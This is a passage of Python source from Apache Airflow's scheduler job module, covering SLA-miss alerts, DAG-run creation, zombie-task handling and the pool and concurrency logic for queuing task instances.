Finds all tasks that have SLAs defined and sends alert emails where needed.
New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any(isinstance(task.sla, timedelta) for task in dag.tasks):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
TI = models.TaskInstance
qry = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti')
)
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(
or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED
)
)
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
max_tis = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == qry.c.task_id,
TI.execution_date == qry.c.max_ti,
).all()
ts = timezone.utcnow()
for ti in max_tis: # pylint: disable=too-many-nested-blocks
task = dag.get_task(ti.task_id)
dttm = ti.execution_date
if isinstance(task.sla, timedelta):
dttm = dag.following_schedule(dttm)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
dttm = dag.following_schedule(dttm)
session.commit()
slas = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas: # pylint: disable=too-many-nested-blocks
sla_dates = [sla.execution_date for sla in slas]
qry = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis = []
for ti in qry:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception: # pylint: disable=broad-except
self.log.exception("Could not call sla_miss_callback for DAG %s",
dag.dag_id)
email_content = """\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n</code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}\n{bug}</code></pre>
""".format(task_list=task_list, blocking_task_list=blocking_task_list,
bug=asciiart.bug)
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.",
sla.task_id)
continue
tasks_missed_sla.append(task)
emails = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
"[airflow] SLA miss on DAG=" + dag.dag_id,
email_content)
email_sent = True
notification_sent = True
except Exception: # pylint: disable=broad-except
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
if email_sent:
sla.email_sent = True
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session, dagbag):
"""
For the DAGs in the given DagBag, record any associated import errors and clear
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.models.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(errors.ImportError(
filename=filename,
timestamp=timezone.utcnow(),
stacktrace=stacktrace))
session.commit()
# pylint: disable=too-many-return-statements,too-many-branches
@provide_session
def create_dag_run(self, dag, dag_runs=None, session=None):
"""
This method checks whether a new DagRun needs to be created
for a DAG based on scheduling interval.
Returns DagRun if one is scheduled. Otherwise returns None.
"""
# pylint: disable=too-many-nested-blocks
if dag.schedule_interval and conf.getboolean('scheduler', 'USE_JOB_SCHEDULE'):
if dag_runs is None:
active_runs = DagRun.find(
dag_id=dag.dag_id,
state=State.RUNNING,
external_trigger=False,
session=session
)
else:
active_runs = [
dag_run
for dag_run in dag_runs
if not dag_run.external_trigger
]
# return if already reached maximum active runs and no timeout setting
if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
return None
timedout_runs = 0
for dr in active_runs:
if (
dr.start_date and dag.dagrun_timeout and
dr.start_date < timezone.utcnow() - dag.dagrun_timeout
):
dr.state = State.FAILED
dr.end_date = timezone.utcnow()
dag.handle_callback(dr, success=False, reason='dagrun_timeout',
session=session)
timedout_runs += 1
session.commit()
if len(active_runs) - timedout_runs >= dag.max_active_runs:
return None
# this query should be replaced by find dagrun
qry = (
session.query(func.max(DagRun.execution_date))
.filter_by(dag_id=dag.dag_id)
.filter(or_(
DagRun.external_trigger == False, # noqa: E712 pylint: disable=singleton-comparison
# add % as a wildcard for the like query
DagRun.run_id.like(DagRunType.SCHEDULED.value + '%')
)
)
)
last_scheduled_run = qry.scalar()
# don't schedule @once again
if dag.schedule_interval == '@once' and last_scheduled_run:
return None
# don't do scheduler catchup for DAGs that don't have dag.catchup = True
if not (dag.catchup or dag.schedule_interval == '@once'):
# The logic is that we move start_date up until
# one period before, so that timezone.utcnow() is AFTER
# the period end, and the job can be created...
now = timezone.utcnow()
next_start = dag.following_schedule(now)
last_start = dag.previous_schedule(now)
if next_start <= now:
new_start = last_start
else:
new_start = dag.previous_schedule(last_start)
if dag.start_date:
if new_start >= dag.start_date:
dag.start_date = new_start
else:
dag.start_date = new_start
next_run_date = None
if not last_scheduled_run:
# First run
task_start_dates = [t.start_date for t in dag.tasks]
if task_start_dates:
next_run_date = dag.normalize_schedule(min(task_start_dates))
self.log.debug(
"Next run date based on tasks %s",
next_run_date
)
else:
next_run_date = dag.following_schedule(last_scheduled_run)
# make sure backfills are also considered
last_run = dag.get_last_dagrun(session=session)
if last_run and next_run_date:
while next_run_date <= last_run.execution_date:
next_run_date = dag.following_schedule(next_run_date)
# don't ever schedule prior to the dag's start_date
if dag.start_date:
next_run_date = (dag.start_date if not next_run_date
else max(next_run_date, dag.start_date))
if next_run_date == dag.start_date:
next_run_date = dag.normalize_schedule(dag.start_date)
self.log.debug(
"Dag start date: %s. Next run date: %s",
dag.start_date, next_run_date
)
# don't ever schedule in the future or if next_run_date is None
if not next_run_date or next_run_date > timezone.utcnow():
return None
# this structure is necessary to avoid a TypeError from concatenating
# NoneType
if dag.schedule_interval == '@once':
period_end = next_run_date
elif next_run_date:
period_end = dag.following_schedule(next_run_date)
# Don't schedule a dag beyond its end_date (as specified by the dag param)
if next_run_date and dag.end_date and next_run_date > dag.end_date:
return None
# Don't schedule a dag beyond its end_date (as specified by the task params)
# Get the min task end date, which may come from the dag.default_args
min_task_end_date = []
task_end_dates = [t.end_date for t in dag.tasks if t.end_date]
if task_end_dates:
min_task_end_date = min(task_end_dates)
if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
return None
if next_run_date and period_end and period_end <= timezone.utcnow():
next_run = dag.create_dagrun(
run_id=DagRunType.SCHEDULED.value + next_run_date.isoformat(),
execution_date=next_run_date,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False
)
return next_run
return None
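# Timing note for create_dag_run above (a sketch, assuming a @daily schedule
# with catchup enabled): the run for execution_date 2020-01-01 is only created
# once period_end = following_schedule(2020-01-01) = 2020-01-02 has passed,
# because of the `period_end <= timezone.utcnow()` guard.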
@provide_session
def _process_task_instances(
self, dag: DAG, dag_runs: List[DagRun], session=None
) -> List[TaskInstanceKeyType]:
"""
This method schedules the tasks for a single DAG by looking at the
active DAG runs and adding task instances that should run to the
queue.
"""
# update the state of the previously active dag runs
active_dag_runs = 0
task_instances_list = []
for run in dag_runs:
self.log.info("Examining DAG run %s", run)
# don't consider runs that are executed in the future unless
# specified by config and schedule_interval is None
if run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.error(
"Execution date is in future: %s",
run.execution_date
)
continue
if active_dag_runs >= dag.max_active_runs:
self.log.info("Number of active dag runs reached max_active_run.")
break
# skip backfill dagruns for now as long as they are not really scheduled
if run.is_backfill:
continue
# todo: run.dag is transient but needs to be set
run.dag = dag # type: ignore
# todo: preferably the integrity check happens at dag collection time
run.verify_integrity(session=session)
ready_tis = run.update_state(session=session)
if run.state == State.RUNNING:
active_dag_runs += 1
self.log.debug("Examining active DAG run: %s", run)
for ti in ready_tis:
self.log.debug('Queuing task: %s', ti)
task_instances_list.append(ti.key)
return task_instances_list
@provide_session
def _process_dags(self, dags: List[DAG], session=None):
"""
Iterates over the dags and processes them. Processing includes:
1. Create appropriate DagRun(s) in the DB.
2. Create appropriate TaskInstance(s) in the DB.
3. Send emails for tasks that have missed SLAs (if CHECK_SLAS config enabled).
:param dags: the DAGs from the DagBag to process
:type dags: List[airflow.models.DAG]
:rtype: list[TaskInstanceKeyType]
:return: A list of keys for the task instances that should be scheduled
"""
check_slas = conf.getboolean('core', 'CHECK_SLAS', fallback=True)
# pylint: disable=too-many-nested-blocks
tis_out: List[TaskInstanceKeyType] = []
dag_ids = [dag.dag_id for dag in dags]
dag_runs = DagRun.find(dag_id=dag_ids, state=State.RUNNING, session=session)
# As per the docs of groupby (https://docs.python.org/3/library/itertools.html#itertools.groupby)
# we need to use `list()` otherwise the result will be wrong/incomplete
dag_runs_by_dag_id = {k: list(v) for k, v in groupby(dag_runs, lambda d: d.dag_id)}
for dag in dags:
dag_id = dag.dag_id
self.log.info("Processing %s", dag_id)
dag_runs_for_dag = dag_runs_by_dag_id.get(dag_id) or []
# Only creates DagRun for DAGs that are not subdag since
# DagRun of subdags are created when SubDagOperator executes.
if not dag.is_subdag:
dag_run = self.create_dag_run(dag, dag_runs=dag_runs_for_dag)
if dag_run:
dag_runs_for_dag.append(dag_run)
expected_start_date = dag.following_schedule(dag_run.execution_date)
if expected_start_date:
schedule_delay = dag_run.start_date - expected_start_date
Stats.timing(
'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
schedule_delay)
self.log.info("Created %s", dag_run)
if dag_runs_for_dag:
tis_out.extend(self._process_task_instances(dag, dag_runs_for_dag))
if check_slas:
self.manage_slas(dag)
return tis_out
def _find_dags_to_process(self, dags: List[DAG], paused_dag_ids: Set[str]) -> List[DAG]:
"""
Find the DAGs that are not paused to process.
:param dags: specified DAGs
:param paused_dag_ids: paused DAG IDs
:return: DAGs to process
"""
if len(self.dag_ids) > 0:
dags = [dag for dag in dags
if dag.dag_id in self.dag_ids and
dag.dag_id not in paused_dag_ids]
else:
dags = [dag for dag in dags
if dag.dag_id not in paused_dag_ids]
return dags
@provide_session
def kill_zombies(self, dagbag, zombies, session=None):
"""
Fail given zombie tasks, which are tasks that haven't
had a heartbeat for too long, in the current DagBag.
:param zombies: zombie task instances to kill.
:type zombies: List[airflow.models.taskinstance.SimpleTaskInstance]
:param session: DB session.
"""
TI = models.TaskInstance
for zombie in zombies:
if zombie.dag_id in dagbag.dags:
dag = dagbag.dags[zombie.dag_id]
if zombie.task_id in dag.task_ids:
task = dag.get_task(zombie.task_id)
ti = TI(task, zombie.execution_date)
# Get properties needed for failure handling from SimpleTaskInstance.
ti.start_date = zombie.start_date
ti.end_date = zombie.end_date
ti.try_number = zombie.try_number
ti.state = zombie.state
ti.test_mode = self.UNIT_TEST_MODE
ti.handle_failure("{} detected as zombie".format(ti),
ti.test_mode, ti.get_template_context())
self.log.info('Marked zombie job %s as %s', ti, ti.state)
Stats.incr('zombies_killed')
session.commit()
@provide_session
def process_file(self, file_path, zombies, pickle_dags=False, session=None):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param file_path: the path to the Python file that should be executed
:type file_path: str
:param zombies: zombie task instances to kill.
:type zombies: List[airflow.models.taskinstance.SimpleTaskInstance]
:param pickle_dags: whether to serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:return: a list of SimpleDags made from the DAGs found in the file, plus the number of import errors
:rtype: Tuple[List[airflow.utils.dag_processing.SimpleDag], int]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
# As DAGs are parsed from this file, they will be converted into SimpleDags
simple_dags = []
try:
dagbag = models.DagBag(file_path, include_examples=False)
except Exception: # pylint: disable=broad-except
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return [], []
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return [], len(dagbag.import_errors)
# Save individual DAGs in the ORM and update DagModel.last_scheduled_time
dagbag.sync_to_db()
paused_dag_ids = DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)
# Pickle the DAGs (if necessary) and put them into a SimpleDag
for dag_id, dag in dagbag.dags.items():
# Only return DAGs that are not paused
if dag_id not in paused_dag_ids:
pickle_id = None
if pickle_dags:
pickle_id = dag.pickle(session).id
simple_dags.append(SimpleDag(dag, pickle_id=pickle_id))
dags = self._find_dags_to_process(dagbag.dags.values(), paused_dag_ids)
ti_keys_to_schedule = self._process_dags(dags, session)
# Refresh all task instances that will be scheduled
TI = models.TaskInstance
filter_for_tis = TI.filter_for_tis(ti_keys_to_schedule)
refreshed_tis = []
if filter_for_tis is not None:
refreshed_tis = session.query(TI).filter(filter_for_tis).with_for_update().all()
for ti in refreshed_tis:
# Add task to task instance
dag = dagbag.dags[ti.key[0]]
ti.task = dag.get_task(ti.key[1])
# We check only deps needed to set TI to SCHEDULED state here.
# Deps needed to set TI to QUEUED state will be batch checked later
# by the scheduler for better performance.
dep_context = DepContext(deps=SCHEDULED_DEPS, ignore_task_deps=True)
# Only schedule tasks that have their dependencies met, e.g. to avoid
# a task that recently got its state changed to RUNNING from somewhere
# other than the scheduler from getting its state overwritten.
if ti.are_dependencies_met(
dep_context=dep_context,
session=session,
verbose=True
):
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
self.log.info("Creating / updating %s in ORM", ti)
session.merge(ti)
# commit batch
session.commit()
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception: # pylint: disable=broad-except
self.log.exception("Error logging import errors!")
try:
self.kill_zombies(dagbag, zombies)
except Exception: # pylint: disable=broad-except
self.log.exception("Error killing zombies!")
return simple_dags, len(dagbag.import_errors)
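# Illustrative sketch (not part of the original module): invoking the file
# processor directly. The DAG file path is hypothetical and an initialized
# Airflow metadata database is assumed.
#
#   processor = DagFileProcessor(dag_ids=[], log=logging.getLogger("airflow.processor"))
#   simple_dags, import_error_count = processor.process_file(
#       file_path="/files/dags/example.py",   # hypothetical path
#       zombies=[],
#       pickle_dags=False,
#   )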
class SchedulerJob(BaseJob):
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: str
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: str
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
'polymorphic_identity': 'SchedulerJob'
}
heartrate = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
dag_id=None,
dag_ids=None,
subdir=settings.DAGS_FOLDER,
num_runs=conf.getint('scheduler', 'num_runs'),
processor_poll_interval=conf.getfloat('scheduler', 'processor_poll_interval'),
do_pickle=False,
log=None,
*args, **kwargs):
# for BaseJob compatibility
self.dag_id = dag_id
self.dag_ids = [dag_id] if dag_id else []
if dag_ids:
self.dag_ids.extend(dag_ids)
self.subdir = subdir
self.num_runs = num_runs
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super().__init__(*args, **kwargs)
self.max_threads = conf.getint('scheduler', 'max_threads')
if log:
self._log = log
self.using_sqlite = False
self.using_mysql = False
if conf.get('core', 'sql_alchemy_conn').lower().startswith('sqlite'):
self.using_sqlite = True
if conf.get('core', 'sql_alchemy_conn').lower().startswith('mysql'):
self.using_mysql = True
self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent = None
def register_exit_signals(self):
"""
Register signals that stop child processes
"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame): # pylint: disable=unused-argument
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier=None):
"""
Is this SchedulerJob alive?
We define alive as being in the RUNNING state with a heartbeat within the
threshold defined by the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
@provide_session
def _change_state_for_tis_without_dagrun(self,
simple_dag_bag,
old_states,
new_state,
session=None):
"""
For all DAG IDs in the SimpleDagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns is
changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag and with states in the old_states will be examined
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
tis_changed = 0
query = session \
.query(models.TaskInstance) \
.outerjoin(models.DagRun, and_(
models.TaskInstance.dag_id == models.DagRun.dag_id,
models.TaskInstance.execution_date == models.DagRun.execution_date)) \
.filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
.filter(models.TaskInstance.state.in_(old_states)) \
.filter(or_(
models.DagRun.state != State.RUNNING,
models.DagRun.state.is_(None))) # pylint: disable=no-member
# We need to do this for mysql as well because it can cause deadlocks
# as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
if self.using_sqlite or self.using_mysql:
tis_to_change = query \
.with_for_update() \
.all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
tis_changed = session \
.query(models.TaskInstance) \
.filter(and_(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date ==
subq.c.execution_date)) \
.update({models.TaskInstance.state: new_state}, synchronize_session=False)
session.commit()
if tis_changed > 0:
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed, new_state
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(self, states, session=None):
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from dag_id to # of task instances in the given states and
a map from (dag_id, task_id) to # of task instances in the given states
:rtype: tuple[dict[str, int], dict[tuple[str, str], int]]
"""
TI = models.TaskInstance
ti_concurrency_query = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map = defaultdict(int)
task_map = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
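# Example of the shapes returned above (values are hypothetical):
#   dag_map  == {"example_dag": 3}
#   task_map == {("example_dag", "task_a"): 2, ("example_dag", "task_b"): 1}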
# pylint: disable=too-many-locals,too-many-statements
@provide_session
def _find_executable_task_instances(self, simple_dag_bag, session=None):
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:return: list of task instances that are ready to be executed
:rtype: list[airflow.models.TaskInstance]
"""
executable_tis = []
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
task_instances_to_examine = (
session
.query(TI)
.filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
.outerjoin(
DR, and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
)
.filter(or_(DR.run_id.is_(None), not_(DR.run_id.like(DagRunType.BACKFILL_JOB.value + '%'))))
.outerjoin(DM, DM.dag_id == TI.dag_id)
.filter(or_(DM.dag_id.is_(None), not_(DM.is_paused)))
.filter(TI.state == State.SCHEDULED)
.all()
)
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(
[repr(x) for x in task_instances_to_examine])
self.log.info(
"%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
task_instance_str
)
# Get the pool settings
pools = {p.pool: p for p in session.query(models.Pool).all()}
pool_to_task_instances = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=STATES_TO_COUNT_AS_RUNNING, session=session)
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
# pylint: disable=too-many-nested-blocks
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning(
"Tasks using non-existent pool '%s' will not be scheduled",
pool
)
continue
open_slots = pools[pool].open_slots(session=session)
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool, open_slots, num_ready
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks = 0
num_tasks_in_executor = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info(
"Not scheduling since there are %s open slots in pool %s",
open_slots, pool
)
# Can't schedule any more since there are no more open slots.
num_starving_tasks = len(priority_sorted_task_instances) - current_index
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
simple_dag = simple_dag_bag.get_dag(dag_id)
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id, current_dag_concurrency, dag_concurrency_limit
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance, dag_id, dag_concurrency_limit
)
continue
task_concurrency_limit = simple_dag.get_task_special_arg(
task_instance.task_id,
'task_concurrency')
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info("Not executing %s since the task concurrency for"
" this task has been reached.", task_instance)
continue
if self.executor.has_task(task_instance):
self.log.debug(
"Not handling task %s as the executor reports it is running",
task_instance.key
)
num_tasks_in_executor += 1
continue
executable_tis.append(task_instance)
open_slots -= 1
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge('pool.starving_tasks.{pool_name}'.format(pool_name=pool_name),
num_starving_tasks)
Stats.gauge('pool.open_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].open_slots())
Stats.gauge('pool.used_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].occupied_slots())
Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(
[repr(x) for x in executable_tis])
self.log.info(
"Setting the following tasks to queued state:\n\t%s", task_instance_str)
# so these don't expire on commit
for ti in executable_tis:
copy_dag_id = ti.dag_id
copy_execution_date = ti.execution_date
copy_task_id = ti.task_id
make_transient(ti)
ti.dag_id = copy_dag_id
ti.execution_date = copy_execution_date
ti.task_id = copy_task_id
return executable_tis
@provide_session
def _change_state_for_executable_task_instances(self, task_instances, session=None):
"""
Changes the state of task instances in the list with one of the given states
to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.
:param task_instances: TaskInstances to change the state of
:type task_instances: list[airflow.models.TaskInstance]
:rtype: list[airflow.models.taskinstance.SimpleTaskInstance]
"""
if len(task_instances) == 0:
session.commit()
return []
TI = models.TaskInstance
tis_to_set_to_queued = (
session
.query(TI)
.filter(TI.filter_for_tis(task_instances))
.filter(TI.state == State.SCHEDULED)
.with_for_update()
.all()
)
if len(tis_to_set_to_queued) == 0:
self.log.info("No tasks were able to have their state changed to queued.")
session.commit()
return []
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(tis_to_set_to_queued)
session.query(TI).filter(filter_for_tis).update(
{TI.state: State.QUEUED, TI.queued_dttm: timezone.utcnow()}, synchronize_session=False
)
session.commit()
# Generate a list of SimpleTaskInstance for the use of queuing
# them in the executor.
simple_task_instances = [SimpleTaskInstance(ti) for ti in tis_to_set_to_queued]
task_instance_str = "\n\t".join([repr(x) for x in tis_to_set_to_queued])
self.log.info("Setting the following %s tasks to queued state:\n\t%s",
len(tis_to_set_to_queued), task_instance_str)
return simple_task_instances
def _enqueue_task_instances_with_queued_state(self, simple_dag_bag,
simple_task_instances):
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param simple_task_instances: TaskInstances to enqueue
:type simple_task_instances: list[SimpleTaskInstance]
:param simple_dag_bag: Should contain all of the task_instances' dags
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
TI = models.TaskInstance
# actually enqueue them
for simple_task_instance in simple_task_instances:
simple_dag = simple_dag_bag.get_dag(simple_task_instance.dag_id)
command = TI.generate_command(
simple_task_instance.dag_id,
simple_task_instance.task_id,
simple_task_instance.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=simple_task_instance.pool,
file_path=simple_dag.full_filepath,
pickle_id=simple_dag.pickle_id)
priority = simple_task_instance.priority_weight
queue = simple_task_instance.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
simple_task_instance.key, priority, queue
)
self.executor.queue_command(
simple_task_instance,
command,
priority=priority,
queue=queue)
@provide_session
def _execute_task_instances(self,
simple_dag_bag,
session=None):
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do not exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:return: Number of task instances whose state was changed.
"""
executable_tis = self._find_executable_task_instances(simple_dag_bag,
session=session)
def query(result, items):
simple_tis_with_state_changed = \
self._change_state_for_executable_task_instances(items,
session=session)
self._enqueue_task_instances_with_queued_state(
simple_dag_bag,
simple_tis_with_state_changed)
session.commit()
return result + len(simple_tis_with_state_changed)
return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
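# Note on the call above: helpers.reduce_in_chunks applies `query` to
# successive chunks of executable_tis of at most self.max_tis_per_query
# items, threading the accumulated count through from the initial value 0,
# so the returned number is the total count of task instances queued.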
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session=None):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if self.executor.queued_tasks:
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# TI.try_number returns the raw try_number + 1 when the TI is not
# running, so subtract 1 here to match the DB record.
